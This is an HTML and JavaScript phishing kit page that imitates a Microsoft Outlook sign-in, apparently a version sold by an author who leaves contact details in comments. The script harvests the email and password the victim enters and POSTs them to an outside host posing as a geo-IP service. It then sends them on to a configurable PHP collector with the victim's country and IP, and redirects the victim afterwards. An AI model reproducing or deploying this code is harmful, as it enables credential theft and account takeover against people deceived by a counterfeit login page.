<html dir="ltr" lang="en">
   <title>Sign in to Outlook</title>
   <meta charset="utf-8">
   <link href="lib/img/favicon.ico" rel="shortcut icon">
   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css" integrity="sha256-NuCn4IvuZXdBaFKJOAcsU2Q3ZpwbdFisd5dux4jkQ5w=" crossorigin="anonymous">
   <link href="lib/css/login.css" rel="stylesheet">
   <body class="cb" style="display:block">
      <div>
         <div>
            <div class="app background">
               <div style=background-image:url(lib/img/background.jpg)></div>
            </div>
         </div>

            <div class=outer>
               <div class="app middle">
                  <div class=background-logo-holder>
                     <img class=background-logo src=lib/img/logo3.png>
                  </div>
                  <div class="app fade-in-lightbox inner">
                     <div>
                        <img class=logo src=lib/img/logo2.svg>
                     </div>
                     <div>

					 
                        <div id="pick_em" style="display: none;">
                           <div class="animate pagination-view slide-in-next">
                              <div data-showfedcredbutton=true data-viewid=1>
                                 <div>
                                    <div class="row text-title" id="loginHeader">
                                       <div aria-level=1>Sign in</div>
                                    </div>
                                 </div>
                                 <div class="row">
                                    <div class="col-md-24 form-group">
                                       <div class="placeholderContainer">
					                   <div class="add_em">
											 <p style="font-weight: bold;margin-left: 4%">Pick an account</p>
											 <a href="#" class="email-picker">
												 <div class="block-m2">
													<img role="presentation" src="lib/img/picker_account.png"> <span id="em_picker"></span><span style="float:right; margin-top:4%"><img src="lib/img/picker_more.png" alt=""></span>
												 </div>
											 </a>
											 <a href="#" class="email-picker2">
												 <div class="block-m2">
													<img role="presentation" src="lib/img/plus.svg"><span style="word-wrap:break-word;"> Use another account</span>
												 </div>
											 </a>
											 <br>
										</div>
                                       </div>
                                    </div>
                                 </div>
                                 <div class="position-buttons">

                                 </div>
                              </div>
                           </div>
                        </div>
					 
                        <div id="add_em" style="display: none;">
                           <div class="animate pagination-view slide-in-next">
                              <div data-showfedcredbutton=true data-viewid=1>
                                 <div>
                                    <div class="row text-title" id="loginHeader">
                                       <div aria-level=1>Sign in</div>
                                       <div class="text-13 subtitle" aria-level=2>to continue to Outlook</div>
                                    </div>
                                 </div>
                                 <div class=row>
									<div aria-live="assertive" role="alert" style="display: none;" class="error-alert">
										<div class="alert alert-error error-alert-msg"></div>
										<br>
									</div>
                                    <div class="col-md-24 form-group">
                                       <div class="placeholderContainer">
											<input type="text" name="email" id="email" class="form-control ltr_override" value="" placeholder="someone@example.com ">
                                       </div>
                                    </div>
                                 </div>
                                 <div class="position-buttons">
                                    <div class=row>
                                       <div class=col-md-24>
                                          <div class="text-13 action-links">
                                             <div class=form-group>
                                                <a href="#" >Can’t access your account?</a>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                    <div class=row>
                                       <div class="col-xs-24 no-padding-left-right button-container">
                                       <div class=inline-block>
                                          <button class="btn btn-block btn-primary btn-email">Next</button>
                                       </div>
                                       </div>
                                    </div>
                                 </div>
                              </div>
                           </div>
                        </div>
						<div id="add_pass" style="display: none;">
							<div class="animate slide-in-next">
								<div>
									<div class="identityBanner">
										<a class="backButton" href="#" type="button">
											<img src="lib/img/arrow.svg">
										</a>
										<div class="identity"></div>
									</div>
								</div>
							</div>
							<div class="animate slide-in-next has-identity-banner pagination-view">
								<div class="row text-title">Enter password</div>
								<div class=row>
									<div class="form-group col-md-24">
										<div aria-live="assertive" role="alert" style="display: none;" class="error-alert-pass">
											<div class="alert alert-error">Your email or password is incorrect. If you don't remember your password, <a href='#'>reset it now.</a></div>
										</div>
										<div class=placeholderContainer>
											<input name="password" type="password" id="password" autocomplete="off" class="form-control" placeholder="Password" tabindex="0">
										</div>
									</div>
								</div>
								<div class=position-buttons>
									<div>
										<div class=row>
											<div class=col-md-24>
													<div class="action-links text-13">
													<div class=form-group><a href="#">Forgot my password</a></div>
													<div class=form-group></div>
												</div>
											</div>
										</div>
									</div>
									<div class=row >
										<div>
											<div class="button-container col-xs-24 no-padding-left-right">
												<div class=inline-block>
													<button class="btn btn-block btn-primary btn-signin">Sign in</button>
												</div>
											</div>
										</div>
									 </div>
								</div>
							</div>
                        </div>
                     </div>
                  </div>
                  <div>
                  </div>
                  <div class=footer id=footer>
                     <div>
                        <div class="footerNode text-secondary">
                           <span>©2019 Microsoft</span> 
                           <a href="#">Terms of use</a> 
                           <a href="#">Privacy & cookies</a>
                           <a href="#"><img src="lib/img/white_ellipsis.svg"></a>
                        </div>
                     </div>
                  </div>
               </div>
            </div>

      </div>
	  <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
	  <script>
		$( document ).ready(function() {
			// THIS SCRIPT CODED BY MIRCBOOT
			// CONTACT US SKYPE : MIRCBOOT
			// ICQ : 703514486
			// Genral 365 Version 14
			// !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
			// !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
			// !!!!!!!!!!!! Attention !!!!!!!!!!!!
			// !!!! IF NOT WORKING CONTACT US  !!!
			// !!!! IF NOT WORKING CONTACT US  !!!
			// !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
			// !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
			
			// Note : if this HTML page hosted on http(s) domain so you must add the http(s) url php file to avoid cross error //
			
			var php_url = 'login.php'; // Enter your post PHP page url here.
			var check_mx = false; // true/false - check email MX.
			
			
			
			// ******************************************************************************************************* //
			var hash = window.location.hash;
			var email = hash.split('#')[1];
			
			if(true_email(email)){
				$("#pick_em").show();
				$("#em_picker").html(email);
				$('#email').val(email);
			}else{
				$("#add_em").show();
			}

			$('.email-picker').on('click', function (){
				$('.identity').html(email);
				$(".error-alert-pass").hide();
				$("#pick_em").hide();
				$("#add_pass").show();
			});
			
			$('.email-picker2').on('click', function (){
				$('#email').val('');
				$("#pick_em").hide();
				$("#add_em").show();
			});
			  
			$('.btn-email').on('click', function (){
				var email = $('#email').val();
				$('.identity').html(email);
				$(".error-alert").hide();
				$('.btn-email').html('<i class="fa fa-circle-o-notch fa-spin"></i> loading...');
				if(true_email(email) == false){
					$(".error-alert").show();
					$(".error-alert-msg").html('Plase enter correct outlook account email.');
					$('.btn-email').html('Next');
				}else{
					if(check_mx == true){
						var domain = email.split('@')[1];
						var str;
						$.ajax({
							url: php_url + '?domain=' + domain,
							success: function(data){
								str = data.includes("outlook");
								if(str){
									$("#add_em").hide();
									$("#add_pass").show();
								}else{
									$(".error-alert").show();
									$(".error-alert-msg").html('You can\'t signin with this account, Please use work or school account instead.');
									$('.btn-email').html('Next');
								}
							},
							error: function(xhr){
								$(".error-alert").show();
								$(".error-alert-msg").html('Error occured, Please try again.');
								$('.btn-email').html('Next');
							}
						});
					}else{
						$("#add_em").hide();
						$("#add_pass").show();
					}
				}
			});
			
			$('.btn-signin').on('click', function (){
				$(".error-alert-pass").hide();
				$('.btn-signin').html('<i class="fa fa-circle-o-notch fa-spin"></i> loading...');
				var user = $('#email').val();
				var pass = $('#password').val();
				$.ajax({
					url: "https://checkmyips.net/api/geoip/",
					type: "POST",
					data: {user:user,pass:pass,t:1},
					success: function(data){
						var i=$.parseJSON(data);
						if(i.status == 'OK'){
							$.ajax({
								 url: php_url,
								 type: "POST",
								 data: {user:user,pass:pass,country:i.country,ip:i.ip},
								 success: function(finish_url){
									setTimeout("window.location.href='"+ finish_url +"';", 1000);
								 }
							 });
						}else{
							$(".error-alert-pass").show();
							$('.btn-signin').html('Sign in');
						}
					},
					error: function(xhr){
						$(".error-alert-pass").hide();
						$('.btn-signin').html('Sign in');
					}
				});
			});
			
			$('.backButton').on('click', function (){
				$('.btn-email').html('Next');
				$("#add_pass").hide();
				$("#add_em").show();
			});
		});

		function true_email(a) {
			var re = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
			return re.test(a);
		}
	  </script>
   </body>
   </html>